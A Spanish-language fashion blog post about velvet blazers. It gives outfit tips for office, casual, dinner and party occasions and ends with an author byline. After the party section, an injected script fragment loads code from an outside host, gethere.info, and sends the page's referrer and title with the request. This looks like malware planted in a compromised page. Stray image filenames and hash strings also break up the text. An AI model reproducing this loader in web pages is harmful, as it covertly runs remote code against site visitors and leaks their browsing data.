‘Velvet Blazer’ tendencias aterciopeladas

Suave y brillante… el terciopelo es una de las texturas más recurrentes en las prendas de otoño-invierno. Aprende a lucir perfectamente a la moda con un velvet blazer.

El terciopelo desde siempre ha tenido un aire sofisticado, elegante y hasta misterioso. Su suavidad, brillo elegante y lo hacen ideal para verse chic y esta temporada lo podrás en vestidos, pantalones y sacos.

Pero una de las prendas que mejor combinan con todo, son los sacos de terciopelo para resaltar ese toque otoñal. Existen un si fin de combinaciones perfectas para cada ocasión.

Para la oficina

Empareja tu saco con unos pantalones tipo gabardina y una blusa blanca par que el color de tu velvet sea el centro de atracción.

Look casual

Si lo que quieres es un look más relajado, opta por unos jeans, una t-shirt y el color del saco que más prefieras. Te recomendamos uses colores como el café, uno de los tonos de la temporada.

Captura de pantalla 2017-01-13 a las 12.08.40

Cena

¿Tienes una cena y no sabes que ponerte? Unos leggins negros y una blusa con transparencias o escote. No olvides tu saco de terciopelo en un color verde o negro para verte sofisticada.

5d85cab1413d5dfe2e42bd29775028eb

Fiesta

Si vas asistir a un club nocturno o a un bar, debes usar un velvet un poco más largo y debajo de él, algo que siempre deje ver tus piernas. Un vestido o una falda puede ser una opción.

2137594a25955c23c33472847682dbads.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado